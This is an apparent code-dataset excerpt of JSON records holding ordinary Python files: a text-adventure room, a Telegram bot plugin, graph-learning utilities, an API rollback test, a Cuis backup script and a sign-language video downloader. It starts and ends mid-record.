38, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.RobustScaler", "line_number": 43, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 56, "usage_type": "call"}, {"api_name": "keras.models.Sequential", "line_number": 66, "usage_type": "call"}, {"api_name": "keras.layers.LSTM", "line_number": 67, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 68, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 69, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 70, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 73, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 74, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 75, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 76, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 78, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 79, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 80, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 81, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 84, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 85, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 86, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 87, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 89, "usage_type": "call"}, {"api_name": "keras.callbacks.EarlyStopping", "line_number": 97, "usage_type": "call"}, {"api_name": "keras.optimizers.Adam", "line_number": 99, "usage_type": "call"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 118, "usage_type": "call"}]}
+{"seq_id": "39627818985", "text": "import spatial\nimport art\nimport player\nimport query\n\ndef sweptaway(player_obj):\n\tprint('')\n\tart.display(\"sweptaway\")\n\tprint('#'*100)\n\tprint(\"You've been swept away!\")\n\tplayer_obj.kill()\n\ndef enter(player_obj, space_obj):\n\tart.display(\"river\")\n\tprint('#'*100)\n\tprint('You are on the edge of a river, it is unsafe to cross.')\n\twhile True:\n\t\tq = input('What would you like to do? ')\n\t\terr, rtext = query.parse_movement(q)\n\t\tif err == False:\n\t\t\tif rtext == 'forward' or rtext == 'right' or rtext == 'left':\n\t\t\t\tsweptaway(player_obj)\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tplayer_obj.move(rtext)\n\t\t\t\tbreak\n\ndef init():\n\triverspace = spatial.space()\n\triverspace.name = \"river\"\n\triverspace.enter = enter\n\tart.load(\"river\", \"content/river.ansi\")\n\tart.load(\"sweptaway\", \"content/sweptaway.ansi\")\n\treturn riverspace", "repo_name": "tomlister/SDDIST-Exemplars", "sub_path": "chooseyourownadventure/content/river.py", "file_name": "river.py", "file_ext": "py", "file_size_in_byte": 790, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "art.display", "line_number": 8, "usage_type": "call"}, {"api_name": "art.display", "line_number": 14, "usage_type": "call"}, {"api_name": "query.parse_movement", "line_number": 19, "usage_type": "call"}, {"api_name": "spatial.space", "line_number": 29, "usage_type": "call"}, {"api_name": "art.load", "line_number": 32, "usage_type": "call"}, {"api_name": "art.load", "line_number": 33, "usage_type": "call"}]}
+{"seq_id": "9266722409", "text": "from pyrogram import Client, filters\nfrom pyrogram.types import (CallbackQuery, InlineKeyboardButton,\n InlineKeyboardMarkup, Message)\n\nfrom TelegramBot import bot\nfrom TelegramBot.helpers.start_constants import *\nfrom TelegramBot.config import OWNER_USERID, SUDO_USERID\nfrom TelegramBot.database import database\nfrom TelegramBot.helpers.decorators import ratelimiter\n\nSTART_BUTTON = [\n [\n InlineKeyboardButton(\"📖 Commands\", callback_data=\"COMMAND_BUTTON\"),\n InlineKeyboardButton(\"👨💻 About me\", callback_data=\"ABOUT_BUTTON\"),\n ],\n [\n InlineKeyboardButton(\n \"🔭 Original Repo\",\n url=\"https://github.com/sanjit-sinha/TelegramBot-Boilerplate\",\n )\n ],\n]\n\n\nCOMMAND_BUTTON = [\n [\n InlineKeyboardButton(\"Users\", callback_data=\"USER_BUTTON\"),\n InlineKeyboardButton(\"Sudo\", callback_data=\"SUDO_BUTTON\"),\n ],\n [InlineKeyboardButton(\"Developer\", callback_data=\"DEV_BUTTON\")],\n [InlineKeyboardButton(\"🔙 Go Back\", callback_data=\"START_BUTTON\")],\n]\n\n\nGOBACK_1_BUTTON = [[InlineKeyboardButton(\"🔙 Go Back\", callback_data=\"START_BUTTON\")]]\nGOBACK_2_BUTTON = [[InlineKeyboardButton(\"🔙 Go Back\", callback_data=\"COMMAND_BUTTON\")]]\n\n\n@Client.on_message(filters.command([\"start\", \"help\"]))\n@ratelimiter\nasync def start(_, message: Message):\n await database.saveUser(message.from_user)\n return await message.reply_text(\n START_CAPTION,\n reply_markup=InlineKeyboardMarkup(START_BUTTON),\n quote=True)\n\n\n@Client.on_callback_query(filters.regex(\"_BUTTON\"))\n@ratelimiter\nasync def botCallbacks(_, CallbackQuery: CallbackQuery):\n\n clicker_user_id = CallbackQuery.from_user.id\n user_id = CallbackQuery.message.reply_to_message.from_user.id\n\n if clicker_user_id != user_id:\n return await CallbackQuery.answer(\"This command is not initiated by you.\")\n\n if CallbackQuery.data == \"SUDO_BUTTON\":\n if clicker_user_id not in SUDO_USERID:\n return await CallbackQuery.answer(\n \"You are not in the sudo user list.\", show_alert=True) \n await CallbackQuery.edit_message_text(\n SUDO_TEXT, reply_markup=InlineKeyboardMarkup(GOBACK_2_BUTTON))\n \n elif CallbackQuery.data == \"DEV_BUTTON\":\n if clicker_user_id not in OWNER_USERID:\n return await CallbackQuery.answer(\n \"This is developer restricted command.\", show_alert=True) \n await CallbackQuery.edit_message_text(\n DEV_TEXT, reply_markup=InlineKeyboardMarkup(GOBACK_2_BUTTON))\n \n if CallbackQuery.data == \"ABOUT_BUTTON\":\n await CallbackQuery.edit_message_text(\n ABOUT_CAPTION, reply_markup=InlineKeyboardMarkup(GOBACK_1_BUTTON))\n\n elif CallbackQuery.data == \"START_BUTTON\":\n await CallbackQuery.edit_message_text(\n START_CAPTION, reply_markup=InlineKeyboardMarkup(START_BUTTON))\n\n elif CallbackQuery.data == \"COMMAND_BUTTON\":\n await CallbackQuery.edit_message_text(\n COMMAND_CAPTION, reply_markup=InlineKeyboardMarkup(COMMAND_BUTTON))\n\n elif CallbackQuery.data == \"USER_BUTTON\":\n await CallbackQuery.edit_message_text(\n USER_TEXT, reply_markup=InlineKeyboardMarkup(GOBACK_2_BUTTON))\n await CallbackQuery.answer()\n\n\n@Client.on_message(filters.new_chat_members, group=1)\nasync def newChat(_, message: Message):\n \"\"\"\n Get notified when someone add bot in the group, then saves that group chat_id\n in the database.\n \"\"\"\n\n chatid = message.chat.id\n for new_user in message.new_chat_members:\n if new_user.id == bot.me.id:\n await database.saveChat(chatid)\n", "repo_name": "sanjit-sinha/TelegramBot-Boilerplate", "sub_path": "TelegramBot/plugins/users/start.py", "file_name": "start.py", "file_ext": "py", "file_size_in_byte": 3715, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 84, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 13, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 14, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 17, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 27, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 28, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 30, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 31, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 35, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 36, "usage_type": "call"}, {"api_name": "pyrogram.types.Message", "line_number": 41, "usage_type": "name"}, {"api_name": "TelegramBot.database.database.saveUser", "line_number": 42, "usage_type": "call"}, {"api_name": "TelegramBot.database.database", "line_number": 42, "usage_type": "name"}, {"api_name": "pyrogram.types.InlineKeyboardMarkup", "line_number": 45, "usage_type": "call"}, {"api_name": "pyrogram.Client.on_message", "line_number": 39, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 39, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 39, "usage_type": "call"}, {"api_name": "pyrogram.filters", "line_number": 39, "usage_type": "name"}, {"api_name": "TelegramBot.helpers.decorators.ratelimiter", "line_number": 40, "usage_type": "name"}, {"api_name": "pyrogram.types.CallbackQuery", "line_number": 51, "usage_type": "name"}, {"api_name": "pyrogram.types.CallbackQuery.from_user", "line_number": 53, "usage_type": "attribute"}, {"api_name": "pyrogram.types.CallbackQuery", "line_number": 53, "usage_type": "name"}, {"api_name": "pyrogram.types.CallbackQuery.message", "line_number": 54, "usage_type": "attribute"}, {"api_name": "pyrogram.types.CallbackQuery", "line_number": 54, "usage_type": "name"}, {"api_name": "pyrogram.types.CallbackQuery.answer", "line_number": 57, "usage_type": "call"}, {"api_name": "pyrogram.types.CallbackQuery", "line_number": 57, "usage_type": "name"}, {"api_name": "pyrogram.types.CallbackQuery.data", "line_number": 59, "usage_type": "attribute"}, {"api_name": "pyrogram.types.CallbackQuery", "line_number": 59, "usage_type": "name"}, {"api_name": "TelegramBot.config.SUDO_USERID", "line_number": 60, "usage_type": "name"}, {"api_name": "pyrogram.types.CallbackQuery.answer", "line_number": 61, "usage_type": "call"}, {"api_name": "pyrogram.types.CallbackQuery", "line_number": 61, "usage_type": "name"}, {"api_name": "pyrogram.types.CallbackQuery.edit_message_text", "line_number": 63, "usage_type": "call"}, {"api_name": "pyrogram.types.CallbackQuery", "line_number": 63, "usage_type": "name"}, {"api_name": "pyrogram.types.InlineKeyboardMarkup", "line_number": 64, "usage_type": "call"}, {"api_name": "pyrogram.types.CallbackQuery.data", "line_number": 66, "usage_type": "attribute"}, {"api_name": "pyrogram.types.CallbackQuery", "line_number": 66, "usage_type": "name"}, {"api_name": "TelegramBot.config.OWNER_USERID", "line_number": 67, "usage_type": "name"}, {"api_name": "pyrogram.types.CallbackQuery.answer", "line_number": 68, "usage_type": "call"}, {"api_name": "pyrogram.types.CallbackQuery", "line_number": 68, "usage_type": "name"}, {"api_name": "pyrogram.types.CallbackQuery.edit_message_text", "line_number": 70, "usage_type": "call"}, {"api_name": "pyrogram.types.CallbackQuery", "line_number": 70, "usage_type": "name"}, {"api_name": "pyrogram.types.InlineKeyboardMarkup", "line_number": 71, "usage_type": "call"}, {"api_name": "pyrogram.types.CallbackQuery.data", "line_number": 73, "usage_type": "attribute"}, {"api_name": "pyrogram.types.CallbackQuery", "line_number": 73, "usage_type": "name"}, {"api_name": "pyrogram.types.CallbackQuery.edit_message_text", "line_number": 74, "usage_type": "call"}, {"api_name": "pyrogram.types.CallbackQuery", "line_number": 74, "usage_type": "name"}, {"api_name": "pyrogram.types.InlineKeyboardMarkup", "line_number": 75, "usage_type": "call"}, {"api_name": "pyrogram.types.CallbackQuery.data", "line_number": 77, "usage_type": "attribute"}, {"api_name": "pyrogram.types.CallbackQuery", "line_number": 77, "usage_type": "name"}, {"api_name": "pyrogram.types.CallbackQuery.edit_message_text", "line_number": 78, "usage_type": "call"}, {"api_name": "pyrogram.types.CallbackQuery", "line_number": 78, "usage_type": "name"}, {"api_name": "pyrogram.types.InlineKeyboardMarkup", "line_number": 79, "usage_type": "call"}, {"api_name": "pyrogram.types.CallbackQuery.data", "line_number": 81, "usage_type": "attribute"}, {"api_name": "pyrogram.types.CallbackQuery", "line_number": 81, "usage_type": "name"}, {"api_name": "pyrogram.types.CallbackQuery.edit_message_text", "line_number": 82, "usage_type": "call"}, {"api_name": "pyrogram.types.CallbackQuery", "line_number": 82, "usage_type": "name"}, {"api_name": "pyrogram.types.InlineKeyboardMarkup", "line_number": 83, "usage_type": "call"}, {"api_name": "pyrogram.types.CallbackQuery.data", "line_number": 85, "usage_type": "attribute"}, {"api_name": "pyrogram.types.CallbackQuery", "line_number": 85, "usage_type": "name"}, {"api_name": "pyrogram.types.CallbackQuery.edit_message_text", "line_number": 86, "usage_type": "call"}, {"api_name": "pyrogram.types.CallbackQuery", "line_number": 86, "usage_type": "name"}, {"api_name": "pyrogram.types.InlineKeyboardMarkup", "line_number": 87, "usage_type": "call"}, {"api_name": "pyrogram.types.CallbackQuery.answer", "line_number": 88, "usage_type": "call"}, {"api_name": "pyrogram.types.CallbackQuery", "line_number": 88, "usage_type": "name"}, {"api_name": "pyrogram.Client.on_callback_query", "line_number": 49, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 49, "usage_type": "name"}, {"api_name": "pyrogram.filters.regex", "line_number": 49, "usage_type": "call"}, {"api_name": "pyrogram.filters", "line_number": 49, "usage_type": "name"}, {"api_name": "TelegramBot.helpers.decorators.ratelimiter", "line_number": 50, "usage_type": "name"}, {"api_name": "pyrogram.types.Message", "line_number": 92, "usage_type": "name"}, {"api_name": "TelegramBot.bot.me", "line_number": 100, "usage_type": "attribute"}, {"api_name": "TelegramBot.bot", "line_number": 100, "usage_type": "name"}, {"api_name": "TelegramBot.database.database.saveChat", "line_number": 101, "usage_type": "call"}, {"api_name": "TelegramBot.database.database", "line_number": 101, "usage_type": "name"}, {"api_name": "pyrogram.Client.on_message", "line_number": 91, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 91, "usage_type": "name"}, {"api_name": "pyrogram.filters.new_chat_members", "line_number": 91, "usage_type": "attribute"}, {"api_name": "pyrogram.filters", "line_number": 91, "usage_type": "name"}]}
+{"seq_id": "20410787261", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 20 18:12:49 2023\n\n@author: Tommaso Giacometti\n\"\"\"\n\nimport torch\nimport torch_geometric as pyg\nfrom torch import Tensor\nimport numpy as np\nfrom plots import Bcolors\nfrom torch_sparse import spspmm, coalesce\nimport matplotlib.pyplot as plt\n\n\n\nEPS = 1e-15\n\n\ndef get_fnn_input(embedding : Tensor, links : Tensor) -> Tensor:\n '''\n Generate the input for the FNN.\n\n Parameters\n ----------\n embedding : Tensor\n The embedding of the VGAE of dimension NxD, where N is the number of nodes and D the embedding dimension.\n links : Tensor (Sparse)\n Adjacency sparse matrix of the links to transform of dimension 2xL.\n\n Returns\n -------\n Tensor\n Inputs for the FNN of dimension Lx2D.\n\n '''\n col1 = torch.squeeze(embedding[links.T[:,0:1]])\n col2 = torch.squeeze(embedding[links.T[:,1:2]])\n x = torch.hstack((col1,col2))\n return x.requires_grad_(True)\n \n\ndef minibatch(tens : Tensor, batch_size : int = 32, shuffle : bool = True) -> Tensor:\n '''\n Transform the tensor in a iterable tensor divided in batch_size's tensors.\n WRANING : if the number of rows of tens is not a multiple of batch_size, a part of the samples will be wasted.\n\n Parameters\n ----------\n tens : Tensor\n Tensor of dimension *x2D to be dividen in batches.\n batch_size : int, optional\n The default is 32.\n shuffle : bool, optional\n Shuffle the row of the input tensor. The default is True.\n\n Returns\n -------\n tens : Tensor\n tensor of size: batches x batch_size x 2D.\n\n '''\n if shuffle:\n ind = torch.randperm(tens.shape[0])\n tens = tens[ind]\n batches = tens.shape[0]//batch_size\n if tens.shape[0]%batch_size == 0:\n tens = tens.view(batches, batch_size, tens.shape[1])\n else:\n print(f'{Bcolors.WARNING}WARNING : {Bcolors.ENDC} since the number of ', end='')\n print(f'training sample {tens.shape[0]} is not a multiple of {batch_size}, ', end='')\n print(f'{tens.shape[0]%batch_size} random samples will be wasted.')\n tens = tens[:batches*batch_size]\n tens = tens.view(batches, batch_size, tens.shape[1])\n return tens\n\n\ndef get_argmax_VGAE(model, data):\n tp = 0\n fp = 0\n model.eval()\n with torch.no_grad():\n z = model.encode(data.x, data.train_pos)\n pos_out = model.decode(z, data.test_pos)\n pos_out = pos_out.cpu().numpy()\n neg_out = model.decode(z, data.test_neg)\n neg_out = neg_out.cpu().numpy()\n for p in pos_out:\n if p > 0.5:\n tp += 1\n for p in neg_out:\n if p > 0.5:\n fp += 1\n tn = len(neg_out) - fp\n fn = len(pos_out) - tp\n assert tp + fn == len(pos_out)\n assert fp + tn == len(neg_out)\n accuracy = (tp+tn)/(tp+tn+fp+fn)\n sensitivity = tp/(tp+fn)\n specificity = tn/(tn+fp)\n precision = tp/(tp+fp)\n fscore = 2*precision*sensitivity/(precision+sensitivity) \n out = dict(accuracy=accuracy, sensitivity=sensitivity, specificity=specificity, precision=precision,fscore=fscore) \n return out\n\n\ndef get_argmax_FNN(model, data):\n model.eval()\n with torch.no_grad():\n h_pos = torch.nn.functional.softmax(model(data.test_emb_pos), dim = 1)\n h_neg = torch.nn.functional.softmax(model(data.test_emb_neg), dim = 1)\n h_pos = torch.argmax(h_pos, dim = 1)\n h_neg = torch.argmax(h_neg, dim = 1)\n h_pos = h_pos.detach().cpu().numpy()\n h_neg = h_neg.detach().cpu().numpy()\n tp = np.sum(h_pos)\n fp = np.sum(h_neg)\n tn = len(h_neg) - fp\n fn = len(h_pos) - tp\n assert tp + fn == len(h_pos)\n assert fp + tn == len(h_neg)\n accuracy = (tp+tn)/(tp+tn+fp+fn)\n sensitivity = tp/(tp+fn)\n specificity = tn/(tn+fp)\n precision = tp/(tp+fp)\n fscore = 2*precision*sensitivity/(precision+sensitivity)\n out = dict(accuracy=accuracy, sensitivity=sensitivity, specificity=specificity, precision=precision,fscore=fscore) \n return out\n \n \ndef column_norm(data : Tensor) -> Tensor:\n features = torch.tensor([data.shape[1]])\n mean = torch.mean(data, 0)\n var = torch.var(data, dim=0)\n std = torch.sqrt(var)\n normal = (data - mean)/(std+EPS)\n return normal/torch.sqrt(features)\n\n\ndef print_dict(dictionary : dict, part = None) -> None:\n print()\n if part is not None:\n print(part)\n for e in dictionary:\n print(f'{e}: {dictionary[e]:.5f}')\n pass\n\n\ndef adj_with_neighbors(adj : Tensor, mat_dim : int, order : int, plot : bool = True):\n values = torch.ones_like(adj[0],requires_grad=False).float()\n adj.requires_grad_(False)\n \n n_pow, val_pow = adj, values\n n_neig = [n_pow.shape[1]]\n i=0\n \n tot_adj = adj.clone()\n tot_val = values.clone()\n \n for i in range(order-1):\n n_pow, val_pow = spspmm(n_pow, val_pow, adj, values, mat_dim, mat_dim, mat_dim)\n n_neig.append(n_pow.shape[1])\n n_pow, val_pow = pyg.utils.remove_self_loops(n_pow,val_pow)\n \n # transform_val = (val_pow+1).clone().log10() # old implementation\n # transform_val = torch.pow(0.8*transform_val/torch.max(transform_val), i+2)\n mean = val_pow.mean()\n std = val_pow.std()\n transform_val = (val_pow.clone()-mean)/std\n transform_val = torch.sigmoid(transform_val)\n transform_val = torch.pow(transform_val, i+1)\n # transform_val = transform_val/(i+1)\n\n tot_adj = torch.hstack((tot_adj,n_pow))\n tot_val = torch.hstack((tot_val,transform_val))\n if len(val_pow) == 0:\n break \n \n if plot:\n exp = list(range(i+2))\n exp = [i+1 for i in exp]\n fig, ax = plt.subplots()\n ax.bar(exp, n_neig)\n ax.set_title('Total number of link for order of the adj matrix')\n ax.set_xlabel('adj matrix order')\n ax.set_ylabel('Number of links')\n plt.show()\n \n tot_adj, tot_val = coalesce(tot_adj, tot_val, mat_dim, mat_dim)\n \n\n return tot_adj, tot_val\n\ndef reconstruct_graph(data, data_fnn, model):\n model.eval()\n with torch.no_grad():\n out_pos = model(data_fnn.test_emb_pos)\n out_neg = model(data_fnn.test_emb_neg)\n links = data.train_pos.clone()\n \n for i, out in enumerate(out_pos):\n if torch.argmax(out) == 1:\n links = torch.hstack((links,data.test_pos[:,i:i+1]))\n for i, out in enumerate(out_neg):\n if torch.argmax(out) == 1:\n links = torch.hstack((links,data.test_neg[:,i:i+1])) \n return links\n \n \n \n \n \n \n \n \n \n ", "repo_name": "TommyGiak/VGAE_FNN", "sub_path": "utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 6678, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "torch.Tensor", "line_number": 21, "usage_type": "name"}, {"api_name": "torch.squeeze", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.squeeze", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.hstack", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 44, "usage_type": "name"}, {"api_name": "torch.randperm", "line_number": 65, "usage_type": "call"}, {"api_name": "plots.Bcolors.WARNING", "line_number": 71, "usage_type": "attribute"}, {"api_name": "plots.Bcolors", "line_number": 71, "usage_type": "name"}, {"api_name": "plots.Bcolors.ENDC", "line_number": 71, "usage_type": "attribute"}, {"api_name": "torch.no_grad", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 110, "usage_type": "call"}, {"api_name": "torch.nn.functional.softmax", "line_number": 111, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 111, "usage_type": "attribute"}, {"api_name": "torch.nn.functional.softmax", "line_number": 112, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 112, "usage_type": "attribute"}, {"api_name": "torch.argmax", "line_number": 113, "usage_type": "call"}, {"api_name": "torch.argmax", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 118, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 132, "usage_type": "name"}, {"api_name": "torch.tensor", "line_number": 133, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 134, "usage_type": "call"}, {"api_name": "torch.var", "line_number": 135, "usage_type": "call"}, {"api_name": "torch.sqrt", "line_number": 136, "usage_type": "call"}, {"api_name": "torch.sqrt", "line_number": 138, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 150, "usage_type": "name"}, {"api_name": "torch.ones_like", "line_number": 151, "usage_type": "call"}, {"api_name": "torch_sparse.spspmm", "line_number": 162, "usage_type": "call"}, {"api_name": "torch_geometric.utils.remove_self_loops", "line_number": 164, "usage_type": "call"}, {"api_name": "torch_geometric.utils", "line_number": 164, "usage_type": "attribute"}, {"api_name": "torch.sigmoid", "line_number": 171, "usage_type": "call"}, {"api_name": "torch.pow", "line_number": 172, "usage_type": "call"}, {"api_name": "torch.hstack", "line_number": 175, "usage_type": "call"}, {"api_name": "torch.hstack", "line_number": 176, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 183, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 183, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 188, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 188, "usage_type": "name"}, {"api_name": "torch_sparse.coalesce", "line_number": 190, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 197, "usage_type": "call"}, {"api_name": "torch.argmax", "line_number": 203, "usage_type": "call"}, {"api_name": "torch.hstack", "line_number": 204, "usage_type": "call"}, {"api_name": "torch.argmax", "line_number": 206, "usage_type": "call"}, {"api_name": "torch.hstack", "line_number": 207, "usage_type": "call"}]}
+{"seq_id": "42445548348", "text": "import json\n\n\ndef test_read_main(simulator_configuration, record_file_name, client):\n response = client.post(\n \"/workspaces/\",\n json=simulator_configuration,\n )\n assert response.status_code == 200\n simulator_id = response.json()[\"id\"]\n\n with open(record_file_name, encoding=\"utf-8\") as f:\n actions = [line.split(\"\\t\")[1] for line in f]\n\n for idx in range(25):\n resp = client.post(\n f\"/workspaces/play/{simulator_id}\",\n json=json.loads(actions[idx]),\n )\n\n saved_resp = resp\n\n for idx in range(25, 50):\n resp = client.post(\n f\"/workspaces/play/{simulator_id}\",\n json=json.loads(actions[idx]),\n )\n\n rollback_resp = client.post(\n f\"/workspaces/rollback/{simulator_id}/24\",\n )\n\n assert rollback_resp.status_code == 200\n\n new_resp = client.post(\n f\"/workspaces/play/{simulator_id}\",\n json=json.loads(actions[24]),\n )\n\n assert saved_resp.json() == new_resp.json()\n", "repo_name": "simaple-team/simaple", "sub_path": "test_app/test_rollback.py", "file_name": "test_rollback.py", "file_ext": "py", "file_size_in_byte": 1013, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 29, "dataset": "github-code", "pt": "32", "api": [{"api_name": "json.loads", "line_number": 18, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 26, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 37, "usage_type": "call"}]}
+{"seq_id": "35652744296", "text": "import subprocess\nimport time\nimport os\nimport datetime\n\ndef take_input():\n CUIS_PATH = raw_input(\"Enter cuis directory (default: .): \") or \"./\"\n SAVING_INTERVAL_IN_SECONDS = int(raw_input(\"Enter interval in seconds to backup (default: 60): \") or 60)\n OUTPUT_DIR_BASE_PATH = raw_input(\"Enter output directory (default: /tmp): \") or \"/tmp\"\n return CUIS_PATH, SAVING_INTERVAL_IN_SECONDS, OUTPUT_DIR_BASE_PATH\n\ndef generate_zip(cuis_path, output_dir, file_name):\n cmd = \"ls -- {}/CuisUniversity* | zip \\\"{}/{}\\\" -@ > /dev/null\".format(cuis_path, output_dir, file_name)\n subprocess.call(cmd, shell=True)\n\ndef create_folder_if_does_not_exist(directory, folder_name):\n absolute_path_to_output = directory + \"/\" + folder_name\n if os.path.isdir(absolute_path_to_output):\n print(\"Folder exists. (path: {})\".format(absolute_path_to_output))\n else:\n print(\"Creating folder at path: {}\".format(absolute_path_to_output))\n os.mkdir(absolute_path_to_output)\n\ndef log_args():\n print(\"----------ARGS----------\")\n print(\"CUIS_PATH: {}\".format(CUIS_PATH))\n print(\"OUTPUT_DIR_PATH: {}\".format(OUTPUT_DIR_BASE_PATH))\n print(\"SAVING_INTERVAL: {} secs.\".format(SAVING_INTERVAL_IN_SECONDS))\n print(\"------------------------\")\n\n\nCUIS_PATH, SAVING_INTERVAL_IN_SECONDS, OUTPUT_DIR_BASE_PATH = take_input()\nlog_args()\n\nOUTPUT_FOLDER_NAME = \"backup-cuis-\" + datetime.datetime.now().strftime('%Y-%m-%d')\ncreate_folder_if_does_not_exist(OUTPUT_DIR_BASE_PATH, OUTPUT_FOLDER_NAME)\nOUTPUT_DIR_PATH = OUTPUT_DIR_BASE_PATH + \"/\" + OUTPUT_FOLDER_NAME\n\nbackup_count = 0\nwhile True:\n\n file_name = datetime.datetime.now().strftime('%Y-%m-%d_%H.%M.%S')\n time_now = datetime.datetime.now().strftime('%H:%M:%S')\n generate_zip(CUIS_PATH, OUTPUT_DIR_PATH, file_name)\n print(\"[{}] Generated backup #{} with name {}\".format(time_now, backup_count, file_name))\n \n backup_count += 1\n time.sleep(SAVING_INTERVAL_IN_SECONDS)\n\n", "repo_name": "scherman/cuis-backupper", "sub_path": "cuis-backupper.py", "file_name": "cuis-backupper.py", "file_ext": "py", "file_size_in_byte": 1959, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "subprocess.call", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 22, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 35, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 35, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 42, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 42, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 43, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 43, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 48, "usage_type": "call"}]}
+{"seq_id": "16161528664", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[2]:\n\n\nimport pandas as pd\nplf = pd.read_csv(\"plf_lexica.csv\")\n\n\n# In[3]:\n\n\nvideos = pd.read_csv(\"videos.csv\")\n\n\n# In[4]:\n\n\nimport json\nvideos_json = {}\nwords = list(plf.iloc[:,0])\n\nfor row in videos.iterrows():\n word = str(row[1][0]).lower()\n \n if word not in words:\n continue\n \n print(row)\n \n if word not in videos_json.keys():\n videos_json[word] = { \n \"urls\" : [], \n \"plfs\" : list(plf.loc[plf[\"Entry ID\"] == word].to_numpy()[0,1:]) }\n \n videos_json[word][\"urls\"].append(row[1][2])\n\n\n# In[ ]:\n\n\nvideos_json[\"hello\"]\n\n\n# In[ ]:\n\n\njson.dump(videos_json,open(\"videos.json\",\"w+\"),indent=True)\n\n\n# In[6]:\n\n\nimport json\nvideos_json = json.load(open(\"videos.json\"))\n\n\n# In[10]:\n\n\nimport os\nnum_vids = 0\nfor word in videos_json.keys():\n if num_vids > 100:\n break\n \n url = videos_json[word][\"urls\"][0]\n \n print(word, url)\n if \"youtube\" in url:\n os.system(f'youtube-dl {url} -o ./videos/{word}.mp4')\n else:\n os.system(f'wget {url} -O ./videos/{word}.mp4')\n\n num_vids += 1\n \n\n\n# In[ ]:\n\n\n\n\n", "repo_name": "leekezar/acorns", "sub_path": "islr data/acorns/scrape SignASL/download_videos.py", "file_name": "download_videos.py", "file_ext": "py", "file_size_in_byte": 1151, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "32", "api": [{"api_name": "pandas.read_csv", "line_number": 8, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 14, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 49, "usage_type": "call"}, {"api_name": "json.load", "line_number": 56, "usage_type": "call"}, {"api_name": "os.system", 